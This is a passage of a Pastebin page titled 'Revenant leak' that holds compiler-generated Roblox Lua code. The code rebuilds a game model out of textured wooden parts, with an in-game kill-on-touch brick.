Advertisement
Aaronremmers14

Revenant leak

May 21st, 2016
332
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 132.90 KB | None | 0 0
  1. --Created with ttyyuu12345's compiler
  2. --ttyyuu12345 is not responsible for damages caused to your game
  3. --This plugin does not remove things
  4. --ttyyuu12345 cannot be held resonsible for manual deletion for the purpose of testing
  5. --Keep in mind, any items that cause errors in compilation will be skipped and documented within the last line of the disclaimer comments
  6. --Thank you for using my plugin and enjoy :)
  7. --It is free to use, however I do accept donations
  8. --Errors: RotateP,Glue,LocalScript
  9. Create = function(itemClass,tabl)
  10. local item = Instance.new(itemClass)
  11. for i,v in pairs(tabl) do
  12. local a,b = ypcall(function() return item[i] end)
  13. if a then
  14. item[i] = tabl[i]
  15. end
  16. end
  17. return item
  18. end
  19. function runDummyScript(f,scri)
  20. local oldenv = getfenv(f)
  21. local newenv = setmetatable({}, {
  22. __index = function(_, k)
  23. if k:lower() == 'script' then
  24. return scri
  25. else
  26. return oldenv[k]
  27. end
  28. end
  29. })
  30. setfenv(f, newenv)
  31. ypcall(function() f() end)
  32. end
  33. cors = {}
  34. mas = Instance.new("Model",game:GetService("Lighting"))
  35. mas.Name = "CompiledModel"
  36. o1 = Create("Model",{
  37. ["Parent"] = mas,
  38. })
  39. o2 = Create("Part",{
  40. ["Parent"] = o1,
  41. ["Material"] = Enum.Material.CorrodedMetal,
  42. ["BrickColor"] = BrickColor.new("Bright red"),
  43. ["Position"] = Vector3.new(-39.400177, 158.990112, 127.299644),
  44. ["Rotation"] = Vector3.new(8.53773884e-007, -7.19941772e-006, -4.03076008e-008),
  45. ["CFrame"] = CFrame.new(-39.400177, 158.990112, 127.299644, 0.999999702, 7.03500147e-010, -1.25653543e-007, -1.42646206e-008, 1, -1.49011647e-008, 2.7464813e-007, 1.49011559e-008, 1),
  46. ["Size"] = Vector3.new(33, 1.20000005, 8),
  47. ["Color"] = Color3.new(0.768628, 0.156863, 0.109804),
  48. })
  49. o3 = Create("Script",{
  50. ["Parent"] = o2,
  51. })
  52. table.insert(cors,coroutine.create(function()
  53. wait()
  54. runDummyScript(function()
  55. function onTouched(part)
  56. local h = part.Parent:findFirstChild("Humanoid")
  57. if h~=nil then
  58. h.Health = 0
  59. end
  60. end
  61. script.Parent.Touched:connect(onTouched)
  62.  
  63.  
  64.  
  65. end,o3)
  66. end))
  67. o4 = Create("Fire",{
  68. ["Parent"] = o2,
  69. ["Size"] = 30,
  70. ["Color"] = Color3.new(1, 0.788235, 0),
  71. ["Enabled"] = false,
  72. ["Heat"] = 25,
  73. ["SecondaryColor"] = Color3.new(1, 0, 0),
  74. })
  75. o5 = Create("Model",{
  76. ["Parent"] = o1,
  77. })
  78. o6 = Create("Part",{
  79. ["Name"] = "trunk",
  80. ["Parent"] = o5,
  81. ["BrickColor"] = BrickColor.new("Dark orange"),
  82. ["Position"] = Vector3.new(-56.9001389, 173.990112, 141.799652),
  83. ["Rotation"] = Vector3.new(-0, -90, 0),
  84. ["Anchored"] = true,
  85. ["CFrame"] = CFrame.new(-56.9001389, 173.990112, 141.799652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  86. ["Size"] = Vector3.new(1, 4.80000019, 2),
  87. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  88. })
  89. o7 = Create("Texture",{
  90. ["Name"] = "top",
  91. ["Parent"] = o6,
  92. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  93. ["Face"] = Enum.NormalId.Top,
  94. ["StudsPerTileU"] = 4,
  95. ["StudsPerTileV"] = 4,
  96. })
  97. o8 = Create("Texture",{
  98. ["Name"] = "back",
  99. ["Parent"] = o6,
  100. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  101. ["Face"] = Enum.NormalId.Back,
  102. ["StudsPerTileU"] = 4,
  103. ["StudsPerTileV"] = 4,
  104. })
  105. o9 = Create("Texture",{
  106. ["Name"] = "left",
  107. ["Parent"] = o6,
  108. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  109. ["Face"] = Enum.NormalId.Left,
  110. ["StudsPerTileU"] = 4,
  111. ["StudsPerTileV"] = 4,
  112. })
  113. o10 = Create("Texture",{
  114. ["Name"] = "right",
  115. ["Parent"] = o6,
  116. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  117. ["Face"] = Enum.NormalId.Right,
  118. ["StudsPerTileU"] = 4,
  119. ["StudsPerTileV"] = 4,
  120. })
  121. o11 = Create("Texture",{
  122. ["Name"] = "bottom",
  123. ["Parent"] = o6,
  124. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  125. ["Face"] = Enum.NormalId.Bottom,
  126. ["StudsPerTileU"] = 4,
  127. ["StudsPerTileV"] = 4,
  128. })
  129. o12 = Create("Decal",{
  130. ["Parent"] = o6,
  131. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  132. })
  133. o13 = Create("Part",{
  134. ["Name"] = "trunk",
  135. ["Parent"] = o5,
  136. ["BrickColor"] = BrickColor.new("Dark orange"),
  137. ["Position"] = Vector3.new(-56.9001389, 172.190109, 144.799652),
  138. ["Rotation"] = Vector3.new(-0, -90, 0),
  139. ["Anchored"] = true,
  140. ["CFrame"] = CFrame.new(-56.9001389, 172.190109, 144.799652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  141. ["Size"] = Vector3.new(1, 1.20000005, 2),
  142. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  143. })
  144. o14 = Create("Texture",{
  145. ["Name"] = "top",
  146. ["Parent"] = o13,
  147. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  148. ["Face"] = Enum.NormalId.Top,
  149. ["StudsPerTileU"] = 4,
  150. ["StudsPerTileV"] = 4,
  151. })
  152. o15 = Create("Texture",{
  153. ["Name"] = "back",
  154. ["Parent"] = o13,
  155. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  156. ["Face"] = Enum.NormalId.Back,
  157. ["StudsPerTileU"] = 4,
  158. ["StudsPerTileV"] = 4,
  159. })
  160. o16 = Create("Texture",{
  161. ["Name"] = "left",
  162. ["Parent"] = o13,
  163. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  164. ["Face"] = Enum.NormalId.Left,
  165. ["StudsPerTileU"] = 4,
  166. ["StudsPerTileV"] = 4,
  167. })
  168. o17 = Create("Texture",{
  169. ["Name"] = "right",
  170. ["Parent"] = o13,
  171. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  172. ["Face"] = Enum.NormalId.Right,
  173. ["StudsPerTileU"] = 4,
  174. ["StudsPerTileV"] = 4,
  175. })
  176. o18 = Create("Texture",{
  177. ["Name"] = "bottom",
  178. ["Parent"] = o13,
  179. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  180. ["Face"] = Enum.NormalId.Bottom,
  181. ["StudsPerTileU"] = 4,
  182. ["StudsPerTileV"] = 4,
  183. })
  184. o19 = Create("Decal",{
  185. ["Parent"] = o13,
  186. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  187. })
  188. o20 = Create("Part",{
  189. ["Name"] = "trunk",
  190. ["Parent"] = o5,
  191. ["BrickColor"] = BrickColor.new("Dark orange"),
  192. ["Position"] = Vector3.new(-56.9001389, 172.790146, 143.799652),
  193. ["Rotation"] = Vector3.new(-0, -90, 0),
  194. ["Anchored"] = true,
  195. ["CFrame"] = CFrame.new(-56.9001389, 172.790146, 143.799652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  196. ["Size"] = Vector3.new(1, 2.4000001, 2),
  197. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  198. })
  199. o21 = Create("Texture",{
  200. ["Name"] = "top",
  201. ["Parent"] = o20,
  202. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  203. ["Face"] = Enum.NormalId.Top,
  204. ["StudsPerTileU"] = 4,
  205. ["StudsPerTileV"] = 4,
  206. })
  207. o22 = Create("Texture",{
  208. ["Name"] = "back",
  209. ["Parent"] = o20,
  210. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  211. ["Face"] = Enum.NormalId.Back,
  212. ["StudsPerTileU"] = 4,
  213. ["StudsPerTileV"] = 4,
  214. })
  215. o23 = Create("Texture",{
  216. ["Name"] = "left",
  217. ["Parent"] = o20,
  218. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  219. ["Face"] = Enum.NormalId.Left,
  220. ["StudsPerTileU"] = 4,
  221. ["StudsPerTileV"] = 4,
  222. })
  223. o24 = Create("Texture",{
  224. ["Name"] = "right",
  225. ["Parent"] = o20,
  226. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  227. ["Face"] = Enum.NormalId.Right,
  228. ["StudsPerTileU"] = 4,
  229. ["StudsPerTileV"] = 4,
  230. })
  231. o25 = Create("Texture",{
  232. ["Name"] = "bottom",
  233. ["Parent"] = o20,
  234. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  235. ["Face"] = Enum.NormalId.Bottom,
  236. ["StudsPerTileU"] = 4,
  237. ["StudsPerTileV"] = 4,
  238. })
  239. o26 = Create("Decal",{
  240. ["Parent"] = o20,
  241. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  242. })
  243. o27 = Create("Part",{
  244. ["Name"] = "trunk",
  245. ["Parent"] = o5,
  246. ["BrickColor"] = BrickColor.new("Dark orange"),
  247. ["Position"] = Vector3.new(-56.9001389, 173.390137, 142.799652),
  248. ["Rotation"] = Vector3.new(-0, -90, 0),
  249. ["Anchored"] = true,
  250. ["CFrame"] = CFrame.new(-56.9001389, 173.390137, 142.799652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  251. ["Size"] = Vector3.new(1, 3.60000014, 2),
  252. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  253. })
  254. o28 = Create("Texture",{
  255. ["Name"] = "top",
  256. ["Parent"] = o27,
  257. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  258. ["Face"] = Enum.NormalId.Top,
  259. ["StudsPerTileU"] = 4,
  260. ["StudsPerTileV"] = 4,
  261. })
  262. o29 = Create("Texture",{
  263. ["Name"] = "back",
  264. ["Parent"] = o27,
  265. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  266. ["Face"] = Enum.NormalId.Back,
  267. ["StudsPerTileU"] = 4,
  268. ["StudsPerTileV"] = 4,
  269. })
  270. o30 = Create("Texture",{
  271. ["Name"] = "left",
  272. ["Parent"] = o27,
  273. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  274. ["Face"] = Enum.NormalId.Left,
  275. ["StudsPerTileU"] = 4,
  276. ["StudsPerTileV"] = 4,
  277. })
  278. o31 = Create("Texture",{
  279. ["Name"] = "right",
  280. ["Parent"] = o27,
  281. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  282. ["Face"] = Enum.NormalId.Right,
  283. ["StudsPerTileU"] = 4,
  284. ["StudsPerTileV"] = 4,
  285. })
  286. o32 = Create("Texture",{
  287. ["Name"] = "bottom",
  288. ["Parent"] = o27,
  289. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  290. ["Face"] = Enum.NormalId.Bottom,
  291. ["StudsPerTileU"] = 4,
  292. ["StudsPerTileV"] = 4,
  293. })
  294. o33 = Create("Decal",{
  295. ["Parent"] = o27,
  296. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  297. })
  298. o34 = Create("Part",{
  299. ["Name"] = "trunk",
  300. ["Parent"] = o5,
  301. ["BrickColor"] = BrickColor.new("Dark orange"),
  302. ["Position"] = Vector3.new(-37.4001999, 172.190109, 146.299652),
  303. ["Anchored"] = true,
  304. ["CFrame"] = CFrame.new(-37.4001999, 172.190109, 146.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  305. ["Size"] = Vector3.new(41, 1.20000005, 2),
  306. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  307. })
  308. o35 = Create("Texture",{
  309. ["Name"] = "top",
  310. ["Parent"] = o34,
  311. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  312. ["Face"] = Enum.NormalId.Top,
  313. ["StudsPerTileU"] = 4,
  314. ["StudsPerTileV"] = 4,
  315. })
  316. o36 = Create("Texture",{
  317. ["Name"] = "back",
  318. ["Parent"] = o34,
  319. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  320. ["Face"] = Enum.NormalId.Back,
  321. ["StudsPerTileU"] = 4,
  322. ["StudsPerTileV"] = 4,
  323. })
  324. o37 = Create("Texture",{
  325. ["Name"] = "left",
  326. ["Parent"] = o34,
  327. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  328. ["Face"] = Enum.NormalId.Left,
  329. ["StudsPerTileU"] = 4,
  330. ["StudsPerTileV"] = 4,
  331. })
  332. o38 = Create("Texture",{
  333. ["Name"] = "right",
  334. ["Parent"] = o34,
  335. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  336. ["Face"] = Enum.NormalId.Right,
  337. ["StudsPerTileU"] = 4,
  338. ["StudsPerTileV"] = 4,
  339. })
  340. o39 = Create("Texture",{
  341. ["Name"] = "bottom",
  342. ["Parent"] = o34,
  343. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  344. ["Face"] = Enum.NormalId.Bottom,
  345. ["StudsPerTileU"] = 4,
  346. ["StudsPerTileV"] = 4,
  347. })
  348. o40 = Create("Texture",{
  349. ["Name"] = "right",
  350. ["Parent"] = o34,
  351. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  352. ["StudsPerTileU"] = 4,
  353. ["StudsPerTileV"] = 4,
  354. })
  355. o41 = Create("Part",{
  356. ["Name"] = "trunk",
  357. ["Parent"] = o5,
  358. ["BrickColor"] = BrickColor.new("Dark orange"),
  359. ["Position"] = Vector3.new(-37.4001999, 175.790146, 143.299652),
  360. ["Anchored"] = true,
  361. ["CFrame"] = CFrame.new(-37.4001999, 175.790146, 143.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  362. ["Size"] = Vector3.new(41, 1.20000005, 2),
  363. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  364. })
  365. o42 = Create("Texture",{
  366. ["Name"] = "top",
  367. ["Parent"] = o41,
  368. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  369. ["Face"] = Enum.NormalId.Top,
  370. ["StudsPerTileU"] = 4,
  371. ["StudsPerTileV"] = 4,
  372. })
  373. o43 = Create("Texture",{
  374. ["Name"] = "back",
  375. ["Parent"] = o41,
  376. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  377. ["Face"] = Enum.NormalId.Back,
  378. ["StudsPerTileU"] = 4,
  379. ["StudsPerTileV"] = 4,
  380. })
  381. o44 = Create("Texture",{
  382. ["Name"] = "left",
  383. ["Parent"] = o41,
  384. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  385. ["Face"] = Enum.NormalId.Left,
  386. ["StudsPerTileU"] = 4,
  387. ["StudsPerTileV"] = 4,
  388. })
  389. o45 = Create("Texture",{
  390. ["Name"] = "right",
  391. ["Parent"] = o41,
  392. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  393. ["Face"] = Enum.NormalId.Right,
  394. ["StudsPerTileU"] = 4,
  395. ["StudsPerTileV"] = 4,
  396. })
  397. o46 = Create("Texture",{
  398. ["Name"] = "bottom",
  399. ["Parent"] = o41,
  400. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  401. ["Face"] = Enum.NormalId.Bottom,
  402. ["StudsPerTileU"] = 4,
  403. ["StudsPerTileV"] = 4,
  404. })
  405. o47 = Create("Texture",{
  406. ["Name"] = "right",
  407. ["Parent"] = o41,
  408. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  409. ["StudsPerTileU"] = 4,
  410. ["StudsPerTileV"] = 4,
  411. })
  412. o48 = Create("Part",{
  413. ["Name"] = "trunk",
  414. ["Parent"] = o5,
  415. ["BrickColor"] = BrickColor.new("Dark orange"),
  416. ["Position"] = Vector3.new(-37.4001999, 176.990112, 142.299652),
  417. ["Anchored"] = true,
  418. ["CFrame"] = CFrame.new(-37.4001999, 176.990112, 142.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  419. ["Size"] = Vector3.new(41, 1.20000005, 2),
  420. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  421. })
  422. o49 = Create("Texture",{
  423. ["Name"] = "top",
  424. ["Parent"] = o48,
  425. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  426. ["Face"] = Enum.NormalId.Top,
  427. ["StudsPerTileU"] = 4,
  428. ["StudsPerTileV"] = 4,
  429. })
  430. o50 = Create("Texture",{
  431. ["Name"] = "back",
  432. ["Parent"] = o48,
  433. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  434. ["Face"] = Enum.NormalId.Back,
  435. ["StudsPerTileU"] = 4,
  436. ["StudsPerTileV"] = 4,
  437. })
  438. o51 = Create("Texture",{
  439. ["Name"] = "left",
  440. ["Parent"] = o48,
  441. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  442. ["Face"] = Enum.NormalId.Left,
  443. ["StudsPerTileU"] = 4,
  444. ["StudsPerTileV"] = 4,
  445. })
  446. o52 = Create("Texture",{
  447. ["Name"] = "right",
  448. ["Parent"] = o48,
  449. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  450. ["Face"] = Enum.NormalId.Right,
  451. ["StudsPerTileU"] = 4,
  452. ["StudsPerTileV"] = 4,
  453. })
  454. o53 = Create("Texture",{
  455. ["Name"] = "bottom",
  456. ["Parent"] = o48,
  457. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  458. ["Face"] = Enum.NormalId.Bottom,
  459. ["StudsPerTileU"] = 4,
  460. ["StudsPerTileV"] = 4,
  461. })
  462. o54 = Create("Texture",{
  463. ["Name"] = "right",
  464. ["Parent"] = o48,
  465. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  466. ["StudsPerTileU"] = 4,
  467. ["StudsPerTileV"] = 4,
  468. })
  469. o55 = Create("Part",{
  470. ["Name"] = "trunk",
  471. ["Parent"] = o5,
  472. ["BrickColor"] = BrickColor.new("Dark orange"),
  473. ["Position"] = Vector3.new(-37.4001999, 174.590088, 144.299652),
  474. ["Anchored"] = true,
  475. ["CFrame"] = CFrame.new(-37.4001999, 174.590088, 144.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  476. ["Size"] = Vector3.new(41, 1.20000005, 2),
  477. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  478. })
  479. o56 = Create("Texture",{
  480. ["Name"] = "top",
  481. ["Parent"] = o55,
  482. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  483. ["Face"] = Enum.NormalId.Top,
  484. ["StudsPerTileU"] = 4,
  485. ["StudsPerTileV"] = 4,
  486. })
  487. o57 = Create("Texture",{
  488. ["Name"] = "back",
  489. ["Parent"] = o55,
  490. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  491. ["Face"] = Enum.NormalId.Back,
  492. ["StudsPerTileU"] = 4,
  493. ["StudsPerTileV"] = 4,
  494. })
  495. o58 = Create("Texture",{
  496. ["Name"] = "left",
  497. ["Parent"] = o55,
  498. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  499. ["Face"] = Enum.NormalId.Left,
  500. ["StudsPerTileU"] = 4,
  501. ["StudsPerTileV"] = 4,
  502. })
  503. o59 = Create("Texture",{
  504. ["Name"] = "right",
  505. ["Parent"] = o55,
  506. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  507. ["Face"] = Enum.NormalId.Right,
  508. ["StudsPerTileU"] = 4,
  509. ["StudsPerTileV"] = 4,
  510. })
  511. o60 = Create("Texture",{
  512. ["Name"] = "bottom",
  513. ["Parent"] = o55,
  514. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  515. ["Face"] = Enum.NormalId.Bottom,
  516. ["StudsPerTileU"] = 4,
  517. ["StudsPerTileV"] = 4,
  518. })
  519. o61 = Create("Texture",{
  520. ["Name"] = "right",
  521. ["Parent"] = o55,
  522. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  523. ["StudsPerTileU"] = 4,
  524. ["StudsPerTileV"] = 4,
  525. })
  526. o62 = Create("Part",{
  527. ["Name"] = "trunk",
  528. ["Parent"] = o5,
  529. ["BrickColor"] = BrickColor.new("Dark orange"),
  530. ["Position"] = Vector3.new(-37.4001999, 173.390137, 145.299652),
  531. ["Anchored"] = true,
  532. ["CFrame"] = CFrame.new(-37.4001999, 173.390137, 145.299652, 1, 0, 0, 0, 1, 0, 0, 0, 1),
  533. ["Size"] = Vector3.new(41, 1.20000005, 2),
  534. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  535. })
  536. o63 = Create("Texture",{
  537. ["Name"] = "top",
  538. ["Parent"] = o62,
  539. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  540. ["Face"] = Enum.NormalId.Top,
  541. ["StudsPerTileU"] = 4,
  542. ["StudsPerTileV"] = 4,
  543. })
  544. o64 = Create("Texture",{
  545. ["Name"] = "back",
  546. ["Parent"] = o62,
  547. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  548. ["Face"] = Enum.NormalId.Back,
  549. ["StudsPerTileU"] = 4,
  550. ["StudsPerTileV"] = 4,
  551. })
  552. o65 = Create("Texture",{
  553. ["Name"] = "left",
  554. ["Parent"] = o62,
  555. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  556. ["Face"] = Enum.NormalId.Left,
  557. ["StudsPerTileU"] = 4,
  558. ["StudsPerTileV"] = 4,
  559. })
  560. o66 = Create("Texture",{
  561. ["Name"] = "right",
  562. ["Parent"] = o62,
  563. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  564. ["Face"] = Enum.NormalId.Right,
  565. ["StudsPerTileU"] = 4,
  566. ["StudsPerTileV"] = 4,
  567. })
  568. o67 = Create("Texture",{
  569. ["Name"] = "bottom",
  570. ["Parent"] = o62,
  571. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  572. ["Face"] = Enum.NormalId.Bottom,
  573. ["StudsPerTileU"] = 4,
  574. ["StudsPerTileV"] = 4,
  575. })
  576. o68 = Create("Texture",{
  577. ["Name"] = "right",
  578. ["Parent"] = o62,
  579. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  580. ["StudsPerTileU"] = 4,
  581. ["StudsPerTileV"] = 4,
  582. })
  583. o69 = Create("Part",{
  584. ["Name"] = "trunk",
  585. ["Parent"] = o5,
  586. ["BrickColor"] = BrickColor.new("Dark orange"),
  587. ["Position"] = Vector3.new(-17.900116, 172.790146, 143.799652),
  588. ["Rotation"] = Vector3.new(-0, 90, 0),
  589. ["Anchored"] = true,
  590. ["CFrame"] = CFrame.new(-17.900116, 172.790146, 143.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  591. ["Size"] = Vector3.new(1, 2.4000001, 2),
  592. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  593. })
  594. o70 = Create("Texture",{
  595. ["Name"] = "top",
  596. ["Parent"] = o69,
  597. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  598. ["Face"] = Enum.NormalId.Top,
  599. ["StudsPerTileU"] = 4,
  600. ["StudsPerTileV"] = 4,
  601. })
  602. o71 = Create("Texture",{
  603. ["Name"] = "back",
  604. ["Parent"] = o69,
  605. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  606. ["Face"] = Enum.NormalId.Back,
  607. ["StudsPerTileU"] = 4,
  608. ["StudsPerTileV"] = 4,
  609. })
  610. o72 = Create("Texture",{
  611. ["Name"] = "left",
  612. ["Parent"] = o69,
  613. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  614. ["Face"] = Enum.NormalId.Left,
  615. ["StudsPerTileU"] = 4,
  616. ["StudsPerTileV"] = 4,
  617. })
  618. o73 = Create("Texture",{
  619. ["Name"] = "right",
  620. ["Parent"] = o69,
  621. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  622. ["Face"] = Enum.NormalId.Right,
  623. ["StudsPerTileU"] = 4,
  624. ["StudsPerTileV"] = 4,
  625. })
  626. o74 = Create("Texture",{
  627. ["Name"] = "bottom",
  628. ["Parent"] = o69,
  629. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  630. ["Face"] = Enum.NormalId.Bottom,
  631. ["StudsPerTileU"] = 4,
  632. ["StudsPerTileV"] = 4,
  633. })
  634. o75 = Create("Decal",{
  635. ["Parent"] = o69,
  636. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  637. })
  638. o76 = Create("Part",{
  639. ["Name"] = "trunk",
  640. ["Parent"] = o5,
  641. ["BrickColor"] = BrickColor.new("Dark orange"),
  642. ["Position"] = Vector3.new(-17.900116, 173.390137, 142.799652),
  643. ["Rotation"] = Vector3.new(-0, 90, 0),
  644. ["Anchored"] = true,
  645. ["CFrame"] = CFrame.new(-17.900116, 173.390137, 142.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  646. ["Size"] = Vector3.new(1, 3.60000014, 2),
  647. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  648. })
  649. o77 = Create("Texture",{
  650. ["Name"] = "top",
  651. ["Parent"] = o76,
  652. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  653. ["Face"] = Enum.NormalId.Top,
  654. ["StudsPerTileU"] = 4,
  655. ["StudsPerTileV"] = 4,
  656. })
  657. o78 = Create("Texture",{
  658. ["Name"] = "back",
  659. ["Parent"] = o76,
  660. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  661. ["Face"] = Enum.NormalId.Back,
  662. ["StudsPerTileU"] = 4,
  663. ["StudsPerTileV"] = 4,
  664. })
  665. o79 = Create("Texture",{
  666. ["Name"] = "left",
  667. ["Parent"] = o76,
  668. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  669. ["Face"] = Enum.NormalId.Left,
  670. ["StudsPerTileU"] = 4,
  671. ["StudsPerTileV"] = 4,
  672. })
  673. o80 = Create("Texture",{
  674. ["Name"] = "right",
  675. ["Parent"] = o76,
  676. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  677. ["Face"] = Enum.NormalId.Right,
  678. ["StudsPerTileU"] = 4,
  679. ["StudsPerTileV"] = 4,
  680. })
  681. o81 = Create("Texture",{
  682. ["Name"] = "bottom",
  683. ["Parent"] = o76,
  684. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  685. ["Face"] = Enum.NormalId.Bottom,
  686. ["StudsPerTileU"] = 4,
  687. ["StudsPerTileV"] = 4,
  688. })
  689. o82 = Create("Decal",{
  690. ["Parent"] = o76,
  691. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  692. })
  693. o83 = Create("Part",{
  694. ["Name"] = "trunk",
  695. ["Parent"] = o5,
  696. ["BrickColor"] = BrickColor.new("Dark orange"),
  697. ["Position"] = Vector3.new(-17.900116, 173.990112, 141.799652),
  698. ["Rotation"] = Vector3.new(-0, 90, 0),
  699. ["Anchored"] = true,
  700. ["CFrame"] = CFrame.new(-17.900116, 173.990112, 141.799652, -0, 0, 1, -0, 1, 0, -1, 0, 0),
  701. ["Size"] = Vector3.new(1, 4.80000019, 2),
  702. ["Color"] = Color3.new(0.627451, 0.372549, 0.207843),
  703. })
  704. o84 = Create("Texture",{
  705. ["Name"] = "top",
  706. ["Parent"] = o83,
  707. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  708. ["Face"] = Enum.NormalId.Top,
  709. ["StudsPerTileU"] = 4,
  710. ["StudsPerTileV"] = 4,
  711. })
  712. o85 = Create("Texture",{
  713. ["Name"] = "back",
  714. ["Parent"] = o83,
  715. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  716. ["Face"] = Enum.NormalId.Back,
  717. ["StudsPerTileU"] = 4,
  718. ["StudsPerTileV"] = 4,
  719. })
  720. o86 = Create("Texture",{
  721. ["Name"] = "left",
  722. ["Parent"] = o83,
  723. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  724. ["Face"] = Enum.NormalId.Left,
  725. ["StudsPerTileU"] = 4,
  726. ["StudsPerTileV"] = 4,
  727. })
  728. o87 = Create("Texture",{
  729. ["Name"] = "right",
  730. ["Parent"] = o83,
  731. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  732. ["Face"] = Enum.NormalId.Right,
  733. ["StudsPerTileU"] = 4,
  734. ["StudsPerTileV"] = 4,
  735. })
  736. o88 = Create("Texture",{
  737. ["Name"] = "bottom",
  738. ["Parent"] = o83,
  739. ["Texture"] = "http://www.roblox.com/asset/?id=2876246",
  740. ["Face"] = Enum.NormalId.Bottom,
  741. ["StudsPerTileU"] = 4,
  742. ["StudsPerTileV"] = 4,
  743. })
  744. o89 = Create("Decal",{
  745. ["Parent"] = o83,
  746. ["Texture"] = "http://www.roblox.com/asset/?id=8162665",
  747. })
  748. o90 = Create("Part",{
  749. ["Parent"] = o5,
  750. ["Material"] = Enum.Material.Wood,
  751. ["BrickColor"] = BrickColor.new("Reddish brown"),
  752. ["Position"] = Vector3.new(-37.4001999, 172.790146, 135.299652),
  753. ["Rotation"] = Vector3.new(-0, -90, 0),
  754. ["Anchored"] = true,
  755. ["CFrame"] = CFrame.new(-37.4001999, 172.790146, 135.299652, 0, 0, -1, 0, 1, -0, 1, 0, -0),
  756. ["FormFactor"] = Enum.FormFactor.Plate,
  757. ["Size"] = Vector3.new(2, 0.400000006, 37),
  758. ["BottomSurface"] = Enum.SurfaceType.Smooth,
  759. ["TopSurface"] = Enum.SurfaceType.Smooth,
